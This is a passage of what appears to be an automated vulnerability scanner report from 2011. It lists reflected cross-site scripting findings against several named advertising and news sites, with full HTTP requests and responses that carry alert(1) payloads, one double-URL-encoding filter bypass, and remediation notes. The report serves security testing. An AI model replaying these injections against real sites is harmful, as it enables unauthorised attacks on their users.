2.40. http://go.savannahnow.com/partner_json/search [when parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

The value of the when request parameter is copied into the HTML document as plain text between tags. The payload 981f1<script>alert(1)</script>87e3a8b3059 was submitted in the when parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=981f1<script>alert(1)</script>87e3a8b3059&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:20 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 13
ETag: "6986547c32d2f6c71a345b5533518c4f"
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: ac041bd2a8770ddbb4df97f54f3d6fc3eb49d0b7
Z-REQUEST-HANDLED-BY: www29
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 464

{"rsp":{"status":"failed","msg":"Unrecognized date format: 981f1<script>alert(1)</script>87e3a8b3059 is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'>
...[SNIP]...

2.41. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 201ed"-alert(1)-"075db5ed9f was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C201ed"-alert(1)-"075db5ed9f HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:39 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1315831719_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 581

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...
QMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C201ed"-alert(1)-"075db5ed9f' width='300' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

2.42. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39080"-alert(1)-"bab3b8cff84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C&39080"-alert(1)-"bab3b8cff84=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:40 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831720_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:40 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 585

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...
MIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C&39080"-alert(1)-"bab3b8cff84=1' width='300' height='600' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

2.43. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4e58"-alert(1)-"f14e903ca51 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpagef4e58"-alert(1)-"f14e903ca51&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:39 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831719_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:39 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 582

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpagef4e58"-alert(1)-"f14e903ca51&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit
...[SNIP]...

2.44. http://js.revsci.net/gateway/gw.js [bpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the bpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db834'%3balert(1)//bfe5e4d0684 was submitted in the bpid parameter. This input was echoed as db834';alert(1)//bfe5e4d0684 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?csid=G07610&bpid=S0277db834'%3balert(1)//bfe5e4d0684 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 12 Sep 2011 12:48:26 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 13 Sep 2011 12:48:26 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:48:26 GMT
Content-Length: 6077

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'G07610';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
i>>18))+"%"+_rsiCa(0x80+(i>>12&0x3F))+"%"+_rsiCa(0x80+(i>>6&0x3F))+"%"+_rsiCa(0x80+(i&0x3F));}window[rsi_csid]=new rsiClient(rsi_csid);
if(window[rsi_csid])window[rsi_csid].DM_addEncToLoc("bpid",'S0277db834';alert(1)//bfe5e4d0684');else DM_addEncToLoc("bpid",'S0277db834';alert(1)//bfe5e4d0684');
function asi_addElem(e){var p=document.body==null?document.getElementsByTagName('head')[0]:document.body;p.insertBefore(e,p.firstChil
...[SNIP]...

2.45. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e011b<script>alert(1)</script>84c98d127a9 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G07610e011b<script>alert(1)</script>84c98d127a9&bpid=S0277 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 12 Sep 2011 12:48:26 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 13 Sep 2011 12:48:26 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:48:25 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G07610E011B<SCRIPT>ALERT(1)</SCRIPT>84C98D127A9" was not recognized.
*/

2.46. http://metrics.impactengine.com/rest/reveal/129534/5011/Expand_Content [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.impactengine.com
Path:   /rest/reveal/129534/5011/Expand_Content

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff9a5%253cscript%253ealert%25281%2529%253c%252fscript%253ec42ce07177e was submitted in the REST URL parameter 3. This input was echoed as ff9a5<script>alert(1)</script>c42ce07177e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rest/reveal/129534ff9a5%253cscript%253ealert%25281%2529%253c%252fscript%253ec42ce07177e/5011/Expand_Content?invalidate=1315849766118 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:07:17 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 104
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><reveal>    <success id='129534ff9a5<script>alert(1)</script>c42ce07177e' /></reveal></rsp>

2.47. http://metrics.impactengine.com/rest/view/129534/5011/0 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.impactengine.com
Path:   /rest/view/129534/5011/0

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 282db%253cscript%253ealert%25281%2529%253c%252fscript%253eec15e8ec8fe was submitted in the REST URL parameter 3. This input was echoed as 282db<script>alert(1)</script>ec15e8ec8fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rest/view/129534282db%253cscript%253ealert%25281%2529%253c%252fscript%253eec15e8ec8fe/5011/0?invalidate=1315849757167 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:07:03 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 110
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><mouse_over>    <success id='129534282db<script>alert(1)</script>ec15e8ec8fe' /></mouse_over</rsp>

2.48. http://metrics.impactengine.com/rest/view/129534/5011/30 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.impactengine.com
Path:   /rest/view/129534/5011/30

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3bc3b%253cscript%253ealert%25281%2529%253c%252fscript%253e5e97cebc5eb was submitted in the REST URL parameter 3. This input was echoed as 3bc3b<script>alert(1)</script>5e97cebc5eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rest/view/1295343bc3b%253cscript%253ealert%25281%2529%253c%252fscript%253e5e97cebc5eb/5011/30?invalidate=1315849787169 HTTP/1.1
Host: metrics.impactengine.com
Proxy-Connection: keep-alive
Referer: http://adserv.impactengine.com/FASAdViewer_1000x1000.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 14:07:21 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Content-Length: 110
Connection: close
Content-Type: text/html; charset=UTF-8

<rsp stat="ok"><mouse_over>    <success id='1295343bc3b<script>alert(1)</script>5e97cebc5eb' /></mouse_over</rsp>

2.49. http://ms0.erovinmo.com/keywords/instrument.js [jsoncallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ms0.erovinmo.com
Path:   /keywords/instrument.js

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 2605f<script>alert(1)</script>490f7962273 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /keywords/instrument.js?jsoncallback=JSONPCallback_02605f<script>alert(1)</script>490f7962273&rewrite=1&user=7DT4-LSd0UCS83EGURP5H.20110912T174842&referrer=http%3A//drupal.org/cases&href=http%3A//www.nowpublic.com/&appCodeName=Mozilla&appMinorVersion=undefined&appName=Netscape&appVersion=5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.1%20%28KHTML%2C%20like%20Gecko%29%20Chrome/13.0.782.220%20Safari/535.1&cpuClass=undefined&platform=Win32&systemLanguage=undefined&userAgent=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.1%20%28KHTML%2C%20like%20Gecko%29%20Chrome/13.0.782.220%20Safari/535.1&userLanguage=undefined&client_timestamp=1315849722.416&target=http%3A%2F%2Fwww.nowpublic.com%2F&site_guid=eba178ba8c951c7df3db8e30420828b4a944a1f6bfefa3cab333d20c7be54610&demo_mode=false HTTP/1.1
Host: ms0.erovinmo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:45:52 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
ETag: "eb9171331ec7a7070901e13e357378cd"
X-Runtime: 52
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 159
Status: 200
Content-Type: text/javascript; charset=utf-8

JSONPCallback_02605f<script>alert(1)</script>490f7962273({"blacklists":[],"xpaths":["//div[@class='content-text']"],"message":"new page re-instrumenting: ok"})

2.50. http://ms4.erovinmo.com/keywords/instrument.js [jsoncallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ms4.erovinmo.com
Path:   /keywords/instrument.js

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 97df2<script>alert(1)</script>c347156b75c was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /keywords/instrument.js?jsoncallback=JSONPCallback_097df2<script>alert(1)</script>c347156b75c&rewrite=1&user=7DT4-LSd0UCS83EGURP5H.20110912T174842;%20s_cc=true;%20s_sq=%5B%5BB%5D%5D;%20__utma=71223567.258103543.1315849717.1315849717.1315849717.1;%20__utmb=71223567.2.10.1315849717;%20__utmc=71223567;%20__utmz=71223567.1315849717.1.1.utmcsr=drupal.org&referrer=http%3A//www.nowpublic.com/&href=http%3A//www.nowpublic.com/&appCodeName=Mozilla&appMinorVersion=undefined&appName=Netscape&appVersion=5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.1%20%28KHTML%2C%20like%20Gecko%29%20Chrome/13.0.782.220%20Safari/535.1&cpuClass=undefined&platform=Win32&systemLanguage=undefined&userAgent=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.1%20%28KHTML%2C%20like%20Gecko%29%20Chrome/13.0.782.220%20Safari/535.1&userLanguage=undefined&client_timestamp=1315850026.67&target=http%3A%2F%2Fwww.nowpublic.com%2F&site_guid=eba178ba8c951c7df3db8e30420828b4a944a1f6bfefa3cab333d20c7be54610&demo_mode=false HTTP/1.1
Host: ms4.erovinmo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _lsx0=2MCV-LSx0ZOAPAI0GDGJ7

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:57:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
ETag: "d009d37e9d56f8f839cea714c7a26681"
X-Runtime: 47
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 159
Status: 200
Content-Type: text/javascript; charset=utf-8

JSONPCallback_097df2<script>alert(1)</script>c347156b75c({"blacklists":[],"xpaths":["//div[@class='content-text']"],"message":"new page re-instrumenting: ok"})

2.51. http://pglb.buzzfed.com/148250/91bc34b96eac101805574950b6644cc6 [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /148250/91bc34b96eac101805574950b6644cc6

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cf6f5<script>alert(1)</script>7bb596485ce was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /148250/91bc34b96eac101805574950b6644cc6?callback=BF_PARTNER.gate_responsecf6f5<script>alert(1)</script>7bb596485ce&cb=1793 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604763
Expires: Mon, 19 Sep 2011 12:47:23 GMT
Date: Mon, 12 Sep 2011 12:48:00 GMT
Connection: close

